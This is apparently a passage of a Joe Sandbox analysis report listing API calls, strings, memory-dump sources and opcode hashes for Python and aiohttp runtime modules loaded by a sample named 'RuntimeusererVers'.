                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Call$Recursive$EnterErr_$DeallocLeaveObject_OccurredStringSubtypeTuple_Type_
                                                                                                                                                                                                                                          • String ID: while calling a Python object$NULL result without error in PyObject_Call
                                                                                                                                                                                                                                          • API String ID: 1205730747-1256585865
                                                                                                                                                                                                                                          • Opcode ID: c948033a7b3defe542d8b49b9e81706fc244dce4e2484c539aedf2ec7ab28b5f
                                                                                                                                                                                                                                          • Instruction ID: b19f2b36b071fd319f1dd63e69af3e9f4049b41b556945c3dac5bd9df731b92a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c948033a7b3defe542d8b49b9e81706fc244dce4e2484c539aedf2ec7ab28b5f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE410C21A28E4686EB589F12EE58A39A3A1FF55FE5F084239DE4D47764EF3CF4458300

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639333229.00007FF81EC91000.00000020.00000001.01000000.0000006C.sdmp, Offset: 00007FF81EC90000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639305403.00007FF81EC90000.00000002.00000001.01000000.0000006C.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639370034.00007FF81ECB7000.00000002.00000001.01000000.0000006C.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639408966.00007FF81ECBF000.00000004.00000001.01000000.0000006C.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639433754.00007FF81ECC1000.00000008.00000001.01000000.0000006C.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639469347.00007FF81ECC2000.00000004.00000001.01000000.0000006C.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639527661.00007FF81ECC6000.00000002.00000001.01000000.0000006C.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec90000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeallocType_$AttrDataDescr_Err_FormatLookupObject_Ready
                                                                                                                                                                                                                                          • String ID: '%.50s' object has no attribute '%U'
                                                                                                                                                                                                                                          • API String ID: 2113936552-1665026449
                                                                                                                                                                                                                                          • Opcode ID: 65b72670b124d071fe0bb91acee10904893d0bafab8c134f6fbfd363caa8fa40
                                                                                                                                                                                                                                          • Instruction ID: 4da1ff2c09130b2cae437960f4a86ed2f80a3192a54c460efdca1912090a7a5f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65b72670b124d071fe0bb91acee10904893d0bafab8c134f6fbfd363caa8fa40
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67511322E29E42C1EB698F12AD4927963A5FB44BE4F084731EE5E17760DF7CF6818700

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1635389670.00007FF81DEE1000.00000020.00000001.01000000.00000073.sdmp, Offset: 00007FF81DEE0000, based on PE: true
• Associated: 0000003A.00000002.1635346587.00007FF81DEE0000.00000002.00000001.01000000.00000073.sdmp
• Associated: 0000003A.00000002.1635452501.00007FF81DF50000.00000002.00000001.01000000.00000073.sdmp
• Associated: 0000003A.00000002.1635488224.00007FF81DF5C000.00000004.00000001.01000000.00000073.sdmp
• Associated: 0000003A.00000002.1635517697.00007FF81DF5D000.00000008.00000001.01000000.00000073.sdmp
• Associated: 0000003A.00000002.1635549310.00007FF81DF5E000.00000004.00000001.01000000.00000073.sdmp
• Associated: 0000003A.00000002.1635576048.00007FF81DF5F000.00000002.00000001.01000000.00000073.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81dee0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSection$ConditionEnterInitializeLeaveVariablememset$DeleteWakecallocfree
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4204190911-0
                                                                                                                                                                                                                                          • Opcode ID: 786c678dbf9e1a74e6e73d2035b61a2c857e4ab1ae038d387392f9073acad0f2
                                                                                                                                                                                                                                          • Instruction ID: 6cdcb9909e6ea436b6b717289a262f9768bdb150f5992b22c72f2f84abd786e7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 786c678dbf9e1a74e6e73d2035b61a2c857e4ab1ae038d387392f9073acad0f2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFB16023A08E5696EB659F25A4103AA6360FF48BE8F195335DE8F06654EF3CE681C700

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639127224.00007FF81EC81000.00000020.00000001.01000000.0000006D.sdmp, Offset: 00007FF81EC80000, based on PE: true
• Associated: 0000003A.00000002.1639087159.00007FF81EC80000.00000002.00000001.01000000.0000006D.sdmp
• Associated: 0000003A.00000002.1639165057.00007FF81EC84000.00000002.00000001.01000000.0000006D.sdmp
• Associated: 0000003A.00000002.1639237335.00007FF81EC86000.00000004.00000001.01000000.0000006D.sdmp
• Associated: 0000003A.00000002.1639272673.00007FF81EC87000.00000002.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$CompareDict_FormatNextOccurredUnicode_
                                                                                                                                                                                                                                          • String ID: %.200s() keywords must be strings$%s() got an unexpected keyword argument '%U'$%s() got multiple values for keyword argument '%U'$_websocket_mask_cython
                                                                                                                                                                                                                                          • API String ID: 2724850958-268793784
                                                                                                                                                                                                                                          • Opcode ID: ec09a6d48d216784302187176dcc5726856883a7d3e28b205bb870558ab9b005
                                                                                                                                                                                                                                          • Instruction ID: 3a6eb6674a90bc6684ab4bc4f8d0fddef8086fe7458e94bd3f4152186e9947f1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec09a6d48d216784302187176dcc5726856883a7d3e28b205bb870558ab9b005
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03519C32B29F4681EB088B55EA44AB863A6FB94FE4F155236CE5D47364EF3CF8458310

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1635389670.00007FF81DEE1000.00000020.00000001.01000000.00000073.sdmp, Offset: 00007FF81DEE0000, based on PE: true
• Associated: 0000003A.00000002.1635346587.00007FF81DEE0000.00000002.00000001.01000000.00000073.sdmp
• Associated: 0000003A.00000002.1635452501.00007FF81DF50000.00000002.00000001.01000000.00000073.sdmp
• Associated: 0000003A.00000002.1635488224.00007FF81DF5C000.00000004.00000001.01000000.00000073.sdmp
• Associated: 0000003A.00000002.1635517697.00007FF81DF5D000.00000008.00000001.01000000.00000073.sdmp
• Associated: 0000003A.00000002.1635549310.00007FF81DF5E000.00000004.00000001.01000000.00000073.sdmp
• Associated: 0000003A.00000002.1635576048.00007FF81DF5F000.00000002.00000001.01000000.00000073.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81dee0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Initialize$CriticalSectionmemset$ConditionVariable$calloc$EnterLeave
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1359542211-0
                                                                                                                                                                                                                                          • Opcode ID: 97906e486ffb2ddf58f8d1d66976afe481b09cf9a0ac9c135b6df8103ec10d42
                                                                                                                                                                                                                                          • Instruction ID: eb07ce413c02f180a02c85775828724b1a2cc937839ca5a34eeb9a005dd1d100
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97906e486ffb2ddf58f8d1d66976afe481b09cf9a0ac9c135b6df8103ec10d42
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37819023A18E86D6EB19CF25A4512AA73A0FF887D4F044235DB8F47651EF3CE6A5C700

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639127224.00007FF81EC81000.00000020.00000001.01000000.0000006D.sdmp, Offset: 00007FF81EC80000, based on PE: true
• Associated: 0000003A.00000002.1639087159.00007FF81EC80000.00000002.00000001.01000000.0000006D.sdmp
• Associated: 0000003A.00000002.1639165057.00007FF81EC84000.00000002.00000001.01000000.0000006D.sdmp
• Associated: 0000003A.00000002.1639237335.00007FF81EC86000.00000004.00000001.01000000.0000006D.sdmp
• Associated: 0000003A.00000002.1639272673.00007FF81EC87000.00000002.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_Format$AttrDeallocObject_String
                                                                                                                                                                                                                                          • String ID: %.200s.%.200s is not a type object$%.200s.%.200s size changed, may indicate binary incompatibility. Expected %zd from C header, got %zd from PyObject$%s.%s size changed, may indicate binary incompatibility. Expected %zd from C header, got %zd from PyObject$builtins
                                                                                                                                                                                                                                          • API String ID: 808083611-401325408
                                                                                                                                                                                                                                          • Opcode ID: 1f4596f3a247802157975afbe54c4fa5e66e589e69acb363bea2f9bfedec8d83
                                                                                                                                                                                                                                          • Instruction ID: d3c81ecaa5f362a71c907b4c9580e3f6f5309f4c608dd49e61bd72621e76e3de
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f4596f3a247802157975afbe54c4fa5e66e589e69acb363bea2f9bfedec8d83
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61313C31A28F5281EB248B11EE44AA9A3A1FF88BF4F414636D98D47664DF3CF544C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638693744.00007FF81EC61000.00000020.00000001.01000000.0000006F.sdmp, Offset: 00007FF81EC60000, based on PE: true
• Associated: 0000003A.00000002.1638664892.00007FF81EC60000.00000002.00000001.01000000.0000006F.sdmp
• Associated: 0000003A.00000002.1638782154.00007FF81EC62000.00000002.00000001.01000000.0000006F.sdmp
• Associated: 0000003A.00000002.1638844829.00007FF81EC64000.00000002.00000001.01000000.0000006F.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec60000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 349153199-0
                                                                                                                                                                                                                                          • Opcode ID: 5d72e879cf7946976a5814a50ab2a295b69da044195d469edd6d5210a35643fb
                                                                                                                                                                                                                                          • Instruction ID: 6a25615080e37dc4acab4ffa221311253c561820c0309b00e8b28e3a11ec5551
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d72e879cf7946976a5814a50ab2a295b69da044195d469edd6d5210a35643fb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01816E21E2CA4346FB549F66BC412BB62E1AFCD7E2F044335EA0D87796DE2CF8458600
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638467028.00007FF81EC51000.00000020.00000001.01000000.00000074.sdmp, Offset: 00007FF81EC50000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638432131.00007FF81EC50000.00000002.00000001.01000000.00000074.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638515598.00007FF81EC53000.00000002.00000001.01000000.00000074.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638578745.00007FF81EC55000.00000004.00000001.01000000.00000074.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638634334.00007FF81EC56000.00000002.00000001.01000000.00000074.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec50000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 349153199-0
                                                                                                                                                                                                                                          • Opcode ID: 423331a2c39e25c209e8438f0d99a820b16d34edfd58e6d039228df5ef57337c
                                                                                                                                                                                                                                          • Instruction ID: 5de5b661736f31b0c7f95ca129e23db49c54ecbcb2990d5c509e55dfc6aace30
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 423331a2c39e25c209e8438f0d99a820b16d34edfd58e6d039228df5ef57337c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3816C21F28E4B86F750AB6A9C492B962D0AFF57E0F544735E90F87796DF2CF8418600
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638905947.00007FF81EC71000.00000020.00000001.01000000.0000006E.sdmp, Offset: 00007FF81EC70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638872780.00007FF81EC70000.00000002.00000001.01000000.0000006E.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638949902.00007FF81EC72000.00000002.00000001.01000000.0000006E.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639016964.00007FF81EC73000.00000004.00000001.01000000.0000006E.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639056414.00007FF81EC74000.00000002.00000001.01000000.0000006E.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec70000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 349153199-0
                                                                                                                                                                                                                                          • Opcode ID: d573cd7bf0bafa259f49a36843b2703105abc7edda614b8f92858340699d7a94
                                                                                                                                                                                                                                          • Instruction ID: a9cd37abcea172b266d0b9b11a79525e074a61defb64780d795083e4fe83eb43
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d573cd7bf0bafa259f49a36843b2703105abc7edda614b8f92858340699d7a94
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7815E61E3CA4346F754AB669CC22B926E2AFC5BE0F144335EA4DC7796DE2CF8458600
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639127224.00007FF81EC81000.00000020.00000001.01000000.0000006D.sdmp, Offset: 00007FF81EC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639087159.00007FF81EC80000.00000002.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639165057.00007FF81EC84000.00000002.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639237335.00007FF81EC86000.00000004.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639272673.00007FF81EC87000.00000002.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 349153199-0
                                                                                                                                                                                                                                          • Opcode ID: 7de1196d3394e08d81985672677c6a629fb10ef14ac0565d7f0cdabffa975e24
                                                                                                                                                                                                                                          • Instruction ID: 2f86fe82eee84e33d8e620df65f7e1eb989ac6cf8bc094d1d7cdb4774f48f59a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7de1196d3394e08d81985672677c6a629fb10ef14ac0565d7f0cdabffa975e24
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6481A060E3CE4346F7589B699E45AB966D2BF95BE0F045335E90D477A6DF3CF8028200
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639333229.00007FF81EC91000.00000020.00000001.01000000.0000006C.sdmp, Offset: 00007FF81EC90000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639305403.00007FF81EC90000.00000002.00000001.01000000.0000006C.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639370034.00007FF81ECB7000.00000002.00000001.01000000.0000006C.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639408966.00007FF81ECBF000.00000004.00000001.01000000.0000006C.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639433754.00007FF81ECC1000.00000008.00000001.01000000.0000006C.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639469347.00007FF81ECC2000.00000004.00000001.01000000.0000006C.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639527661.00007FF81ECC6000.00000002.00000001.01000000.0000006C.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec90000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dict_String$Item$Tuple_$Pack$FromLongLong_$Dealloc$Object_SizeUnicode_$AttrCallCode_EmptyErr_Fetch
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2217525345-0
                                                                                                                                                                                                                                          • Opcode ID: 1752a3f49b0f0487f841e5135dab3343f20982d458e3b190c02c5a0d2175f4c0
                                                                                                                                                                                                                                          • Instruction ID: fe4d9c9711959cdf777ba1e6b6b3f01d95d8e5599f649992ea58bbf2b76a2a16
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1752a3f49b0f0487f841e5135dab3343f20982d458e3b190c02c5a0d2175f4c0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E515A74A2AF0281EB159B59BC542A533A5FF88BE0F44537AD98D073A4EF3DF6618340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1639127224.00007FF81EC81000.00000020.00000001.01000000.0000006D.sdmp, Offset: 00007FF81EC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639087159.00007FF81EC80000.00000002.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639165057.00007FF81EC84000.00000002.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639237335.00007FF81EC86000.00000004.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1639272673.00007FF81EC87000.00000002.00000001.01000000.0000006D.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dict_$Err_FormatHashItem_Known$Size
                                                                                                                                                                                                                                          • String ID: %.200s() takes %.8s %zd positional argument%.1s (%zd given)$_websocket_mask_cython$aiohttp._websocket._websocket_mask_cython$exactly
                                                                                                                                                                                                                                          • API String ID: 742021863-782616090
                                                                                                                                                                                                                                          • Opcode ID: fa3c9ec0253440b82388672cbaf99f3bbb1e0c3b5909f04a064cfbc31425cbd4
                                                                                                                                                                                                                                          • Instruction ID: a328f26429b80a22bfcb752b50e48d9737d84b84218ad203829c00f89433f77a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa3c9ec0253440b82388672cbaf99f3bbb1e0c3b5909f04a064cfbc31425cbd4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B410075A28F4681EB248B15EE4096AA3E4FB89BE0F540236DE8D07B55DF3CF591C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,?,?,?,?,?,?,00007FF81DEE25AD), ref: 00007FF81DEE260C
                                                                                                                                                                                                                                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00007FF81DEE25AD), ref: 00007FF81DEE2618
                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,?,?,?,?,?,?,00007FF81DEE25AD), ref: 00007FF81DEE2668
                                                                                                                                                                                                                                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00007FF81DEE25AD), ref: 00007FF81DEE2674
                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32 ref: 00007FF81DEE269A
                                                                                                                                                                                                                                          • InitializeConditionVariable.KERNEL32 ref: 00007FF81DEE26A7
                                                                                                                                                                                                                                          • InitializeConditionVariable.KERNEL32 ref: 00007FF81DEE26B4
                                                                                                                                                                                                                                          • memset.VCRUNTIME140 ref: 00007FF81DEE26F1
                                                                                                                                                                                                                                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF81DEE26FD
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DEE2790: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF81DEE2780), ref: 00007FF81DEE27AF
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DEE2790: LeaveCriticalSection.KERNEL32 ref: 00007FF81DEE27C3
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DEE2790: WakeAllConditionVariable.KERNEL32 ref: 00007FF81DEE27D0
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DEE2790: WakeAllConditionVariable.KERNEL32 ref: 00007FF81DEE27DD
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DEE2790: WaitForSingleObject.KERNEL32 ref: 00007FF81DEE2815
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DEE2790: CloseHandle.KERNEL32 ref: 00007FF81DEE2820
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DEE2790: GetLastError.KERNEL32 ref: 00007FF81DEE282E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DEE2790: DeleteCriticalSection.KERNEL32 ref: 00007FF81DEE284B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1635389670.00007FF81DEE1000.00000020.00000001.01000000.00000073.sdmp, Offset: 00007FF81DEE0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635346587.00007FF81DEE0000.00000002.00000001.01000000.00000073.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635452501.00007FF81DF50000.00000002.00000001.01000000.00000073.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635488224.00007FF81DF5C000.00000004.00000001.01000000.00000073.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635517697.00007FF81DF5D000.00000008.00000001.01000000.00000073.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635549310.00007FF81DF5E000.00000004.00000001.01000000.00000073.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635576048.00007FF81DF5F000.00000002.00000001.01000000.00000073.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81dee0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConditionCriticalSectionVariable$Initializecallocmemset$Wake$CloseDeleteEnterErrorHandleLastLeaveObjectSingleWait
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 708475683-0
                                                                                                                                                                                                                                          • Opcode ID: bb3fcba4a768b6f5dfd495e022c2bc2d456dfefaf024495bd1f501c25eca83fd
                                                                                                                                                                                                                                          • Instruction ID: a081bb44ca922e19658c318c9dc7ed394d58fdc172dd59397c7d3f8f1aef5594
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb3fcba4a768b6f5dfd495e022c2bc2d456dfefaf024495bd1f501c25eca83fd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A517C33A15F568AEB458F25E84036A63A5FF89BD5F044235DE4E07BA9EF38D441C360
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1635389670.00007FF81DEE1000.00000020.00000001.01000000.00000073.sdmp, Offset: 00007FF81DEE0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635346587.00007FF81DEE0000.00000002.00000001.01000000.00000073.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635452501.00007FF81DF50000.00000002.00000001.01000000.00000073.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635488224.00007FF81DF5C000.00000004.00000001.01000000.00000073.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635517697.00007FF81DF5D000.00000008.00000001.01000000.00000073.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635549310.00007FF81DF5E000.00000004.00000001.01000000.00000073.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1635576048.00007FF81DF5F000.00000002.00000001.01000000.00000073.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81dee0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$ConditionVariablememset$DeleteSleepWakefreemalloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2005627279-0
                                                                                                                                                                                                                                          • Opcode ID: 5b5cf4217db0e87d0dbf6b2d27dc5cd07cde69938fb8ec553d79b0705bf93a69
                                                                                                                                                                                                                                          • Instruction ID: a567800052566bac949ded41aae74a5c15cdf3e63edede4ac0ba535a619dd639
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b5cf4217db0e87d0dbf6b2d27dc5cd07cde69938fb8ec553d79b0705bf93a69
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9126E23A18B8597E6298F28E5103B9B360FB99794F159335DB9E13651EF38F2E4C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000003A.00000002.1638467028.00007FF81EC51000.00000020.00000001.01000000.00000074.sdmp, Offset: 00007FF81EC50000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638432131.00007FF81EC50000.00000002.00000001.01000000.00000074.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638515598.00007FF81EC53000.00000002.00000001.01000000.00000074.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638578745.00007FF81EC55000.00000004.00000001.01000000.00000074.sdmp
                                                                                                                                                                                                                                          • Associated: 0000003A.00000002.1638634334.00007FF81EC56000.00000002.00000001.01000000.00000074.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_58_2_7ff81ec50000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ModuleType_$Arg_$KeywordsPositional
                                                                                                                                                                                                                                          • String ID: SimpleQueue
                                                                                                                                                                                                                                          • API String ID: 4181285317-3395603730
